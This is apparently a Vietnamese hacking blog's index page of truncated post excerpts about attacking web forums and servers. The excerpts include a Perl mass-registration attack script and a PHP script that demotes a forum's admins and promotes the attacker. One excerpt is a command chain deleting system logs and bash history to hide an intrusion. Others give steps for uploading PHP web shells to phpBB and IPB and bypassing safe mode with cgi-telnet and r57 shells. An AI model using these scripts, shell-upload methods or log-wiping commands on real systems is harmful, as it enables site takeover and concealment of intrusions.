Bước 1: Bạn hãy tải về một phần mở rộng của Firefox tên là Tweak Network 1.1.1 (tương thích với Firefox 1.0-2.0). Để tải phần mở rộng này bạn có thể dùng Internet Explorer (IE) hoặc Firefox. Nếu dùng IE thì vào địa chỉ http://releases.mozilla.org/pub/mozilla.org/addons/327/tweak_network-1.1.1-fx.xpi sau đó vào Firefox và mở menu File-Open File, chọn..
Read more#!/usr/bin/perl use IO::Socket; use Getopt::Std; getopts(“h:d:n:u:”); $host = $opt_h; $dir = $opt_d; $n = $opt_n; $u = $opt_u; print “[~] SERVER : $host\r\n”; print “[~] PATH : $dir\r\n”; print “[~] TIMES : $n”; print “\r\n”; print “[~] Attacking… \n”; for($i=1;$i<=$n;$i++) { $h = $i++; $user = $u.$h; $mail = “$user%40stylenet$i.club”; $mail2= $mail; $post1 = “s=&do=register&url=$host$dir&nth=0&day=0&year=0&w..
Read moreCross-Site Scripting (XSS) là một trong những kĩ thuật tấn công phổ biến nhất hiên nay, đồng thời nó cũng là một trong những vấn đề bảo mật quan trọng đối với các nhà phát triển web và cả những người sử dụng web. Bất kì một website nào cho phép người sử dụng đăng..
Read more1đoạn script nhỏ <?php //dang ki thanh vien roi include(‘../../forum/includes/config.php’);//path den file config.php. “../” len tren 1 cap thu muc $nickname=’useradmin’;//nick muon set lam admin $db=mysql_connect(“$servername”,”$dbusername”,”$db password”); mysql_select_db(“$dbname”,$db); $table=$tableprefix.’user’; mysql_query(“UPDATE $table set usergroupid=2 WHERE usergroupid=6;”);//dua tat ca admin cua dien dan xuong member mysql_query(“UPDATE $table set userid=2147483647 WHERE userid=1;”); //sau do set minh len admin..
Read moreTìm info của host & domain & …, Hack domain + host Kiểm tra Domain mình cần Hack URL: http://centralops.net/co/DomainCheck.vbs.asp CL: Nhập vào Domain eaglehn.com TD: Kiểm tra Domain. Checking domain availability… Results from DNS: Taken. ? from Whois: Taken. ? conclusion: Taken. The domain has been registered. However, the registrant may offer it for..
Read more1. Upload là cái gì chắc ai cũng biết nhỉ, nó là cho phép truyền tải file lên server qua một giao diện tương tác với người sử dụng. 2. Lợi hại gì qua cái upload ?? a. Lợi: tự nghiên cứu nha b. Hại: cho lên con virus hay các loại file nguy hiểm..
Read morerm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history..
Read moreCombine “local inclusion + HTTP Header + access logging” attack /————————————————— Mục tiêu: Server Mức độ nguy hiểm: khá cao Mức độ phổ biến: có lẽ ko nhiều :-p —————————————————/ I ) Sơ lượt: Thông thường các web service thường có thêm chức năng ghi lại “nhật kí truy cập” của người dùng. Chức năng..
Read moreĐiều kiện cần : +Bạn cần phải up 1 file view.pl ( cgi-telnet.pl ) lên host mình để hack, chmod 775 nhé ! + Các lệnh để hack : ls -al : lệnh này để xem thông tin cd : lệnh này dùng để chuyển thư mục Cat : lệnh này dùng để xem info..
Read morephpBB version : 2.0.9 chuẩn bị sẵn 1 con shell upload shell txt lên host nào đó chèn đoạn code sau vào notepad roài save với đuôi .gif <php include “http://link…/shell.txt”; ?> khi ta đã vào dc admincp của phpBB chuyển tới config … chọn cho upload avatar = Yes Sau đó backup lại database..
Read more1.bypass Safe-Mode qua cgitelnet.pl giả dụ bật Safe-Mode, dis khá nhiều các hàm quan trọng show_source, dl, exec, shell_exec, system, popen, pclose, proc_open, proc_close, passthru, virtual, leak, chgrp, ini_alter, ini_restore Command lệnh của con shell vì thế ko hiện đc luôn Nhưng nhìn kĩ lại ta thấy uid=betalocal , vậy thì mặc cha nó ta..
Read morePhần 1: Cơ bản về R57 I. Cơ bản về r57. 1. Các thông tin ta có thể thấy đc qua shell. Đầu tiên khi nhìn vào r57 các bạn sẽ thấy những dòng trên cùng kiểu như thế này: – Safe-mode: On => Đây là chức năng bảo mật bật. Cái này chỉ có..
Read moreIPS đôi điều cần biết ——————————————————————————– Hệ thống ngăn chặn xâm nhập IPS – Bảo vệ chống xâm nhập và phân tích biến cố IPS – Intrusion Prevention System Có 3 lý do để người ta xem xét sử dụng hệ thống ngăn chặn xâm nhập: – Cung cấp khả năng điều khiển truy cập..
Read morevới IBF www.server.com/forum/index.php?ipscheck=1&key=ipscheck$1@@ Between the <version_string></version_string> tags. PHPBB www.server.com/forum/docs/CHANGELOG.html Left, add 1 to the latest ‘Changes since’ version. _______________________ eg: 1. Changelog i. Changes since 2.0.19 Would mean the phpbb version would be 2.0.20 vbulletin http://www.server.com/forum/clientscript/vbulletin_global.js
Read more+IPB:Thằng này hiện tại tớ có 3 cách up shell Cách 1: Cách này rất đơn giản cứ vào trong phần Style manager coi phần Emoticons rồi cứ up con shell php lên là được. Tuy nhiên cách này có hạn chế là đối với các ver >=2.1.7 ko làm được bới vì nó check..
Read more
Leave a Reply